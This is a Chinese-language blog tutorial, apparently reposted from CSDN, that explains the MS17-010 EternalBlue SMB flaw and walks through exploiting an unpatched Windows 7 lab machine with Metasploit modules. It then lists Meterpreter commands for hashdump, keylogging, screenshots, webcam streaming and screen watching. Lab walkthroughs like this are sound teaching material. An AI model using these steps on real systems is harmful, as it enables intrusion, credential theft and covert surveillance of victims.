ms17-010永恒之蓝漏洞利用,渗透同一局域网下的windows7

MS17-010(永恒之蓝)漏洞分析与复现

一、漏洞介绍

永恒之蓝漏洞是指Windows操作系统中存在的一种安全漏洞,该漏洞是由美国国家安全局(NSA)开发的一种工具所造成的。这个工具被称为“永恒之蓝”(EternalBlue),它是一种利用Windows操作系统中的SMB协议漏洞进行攻击的工具。

这个漏洞被公开后,黑客们很快就利用它进行了大规模的攻击。在2017年5月,全球范围内的许多组织和机构都遭受了永恒之蓝攻击的影响,包括英国国家医疗服务体系(NHS)、西班牙电信公司等。这些攻击造成的损失是巨大的,包括数据丢失、系统瘫痪等。

为了解决这个漏洞,微软公司发布了一系列的安全补丁,但是由于许多用户没有及时更新系统,仍然存在着许多系统存在漏洞的情况。此外,由于永恒之蓝攻击的成功,黑客们也开始利用其他漏洞进行攻击,这使得网络安全问题变得更加紧迫。

为了保护自己的系统和数据,用户需要采取一系列的安全措施。首先,用户应该及时更新系统和软件,以确保系统中的漏洞得到及时修复。其次,用户应该安装杀毒软件和防火墙,以保护系统免受恶意软件的攻击。此外,用户还应该加强密码的保护,定期更换密码,并避免使用弱密码。

总之,永恒之蓝漏洞是一种非常危险的漏洞,对于用户来说,保护自己的系统和数据是至关重要的。只有通过不断的学习和加强安全意识,才能更好地保护自己的网络安全。

二、漏洞原理:

1、攻击原理

永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

2、影响版本:

目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

三、漏洞复现

复现环境:

攻击机:kali Linux 2021.2(IP:192.168.210.145)

靶机:Windows 7 (x64)(IP:192.168.210.133)

实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!

扫描主机(使用kai自带的工具nmap进行主机发现)

                                可以看到IP为192.168.210.133的主机开放445端口

1、打开msfconsole漏洞利用工具

2、使用search命令搜索ms17-010漏洞模块

auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

3、使用名为:auxiliary/admin/smb/ms17_010_command 模块进行漏洞扫描

使用方法:use 模块名

4、使用show options 命令查看哪些需要设置的参数

          可以看到,需要设置扫描的主机,也就是说你需要查看哪个主机有没有漏洞

5、设置需要扫描的主机是否存在漏洞,使用命令:set rhosts 要扫描的IP

6、执行扫描,使用exploit 或者run命令执行

                                        如果出现以上结果,就说明存在漏洞。

7、使用exploit/windows/smb/ms17_010_eternalblue攻击模块进行攻击

使用方法:use 模块名

8、使用show options 查看需要设置的参数

                        可以看到,需要设置RHOSTS 需要设置攻击IP

9、使用set命令进行设置 使用方法:set rhosts 被攻击的IP

10、执行攻击,使用exploit 或者run命令执行

        出现以上提示,就表示攻击完成!

11、在控制台 我们输入help  可以查看攻击命令

以上有很多攻击命令,比如:

1. `sysinfo`:显示目标机器的系统信息。

2. `getuid`:显示当前用户的权限等级。

3. `ps`:显示目标机器上所有正在运行的进程。

4. `ls`:列出目标机器上的文件和目录。

5. `cd`:更改目标机器上的当前目录。

6. `download`:下载目标机器上的文件。

7. `upload`:上传文件到目标机器上。

8. `shell`:在目标机器上打开一个命令行终端。

9. `migrate`:将 Meterpreter 会话转移到另一个进程。

10. `hashdump`:获取目标机器上的密码哈希。

11. `keyscan_start`:记录键盘击键。

12. `keyscan_dump`:输出记录的键盘击键。

13. `screenshot`:获取目标机器的屏幕截图。

14. `webcam_snap`:获取目标机器上连接的摄像头的照片。

15. `portfwd`:设置端口转发规则。

以上命令只是一些常用的命令,Meterpreter 支持的命令非常多,具体可以参考 Meterpreter 的官方文档。

Meterpreter 的官方文档地址:

Metasploit Unleashed - Free Online Ethical Hacking Course

12、我们可以打开目标机的摄像头,输入命令webcam_stream

使用命令打开摄像头后,会自动打开浏览器后,上面可以看到提示:

目标 IP: 192.168.210.133

开始时间: 2023-05-1810:22.16 + 0800

状态: 正在播放

PS:需要注意的是,对方需要有摄像头硬件,没有的话会导致命令出现错误提示!

13、我们还可以实时监控对方屏幕,输入命令:screenshare

                可以看到,输出screenshare命令后,自动打开浏览器进行监视

PS:以上只是简单的进行演示,告诉大家这个漏洞很危险,其实真正的渗透可以做很多!

猜你喜欢

转载自blog.csdn.net/m0_63533079/article/details/123359223